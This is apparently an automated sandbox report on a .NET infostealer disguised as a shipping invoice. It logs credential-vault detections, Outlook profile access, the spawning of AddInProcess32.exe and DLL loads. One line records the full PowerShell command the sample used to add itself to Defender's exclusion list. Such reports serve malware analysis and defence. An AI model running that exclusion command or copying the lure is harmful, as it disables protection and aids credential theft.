Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000000.1210321020.0000019863842000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330580977.0000019863B90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename64c577c6-448e-42d3-b613-c285a2ac0196.exe4 vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEdopejiqajahafecobL vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330707407.0000019865656000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000000.1210335931.000001986384A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Binary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Binary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, KLhJmaON.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, PublicationOnlyViaConstructorsetUnixFileMode.cs | Suspicious URL: 'https://www.google.ru/'
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, PublicationOnlyViaConstructorsetUnixFileMode.cs | Suspicious URL: 'https://www.google.ru/'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@9/10@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yefk2xkd.aml.ps1
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 occurrences)
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | File read: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: unknown | Process created: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Section loaded: ucrtbase_clr0400.dll (loaded twice)
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Windows.Forms.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb0X source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: 0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183C9A2 push ss; retf 0_2_00007FF7C183C9A4
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18300BD pushad ; iretd 0_2_00007FF7C18300C1
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183C86D push ss; iretd 0_2_00007FF7C183C86F
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183D865 push ebp; iretd 0_2_00007FF7C183D868
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18307B5 push eax; ret 0_2_00007FF7C18307EB
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C194060B push esp; retf 4810h0_2_00007FF7C19406B2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B3CC4E pushfd ; iretd 4_2_02B3CC5A
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
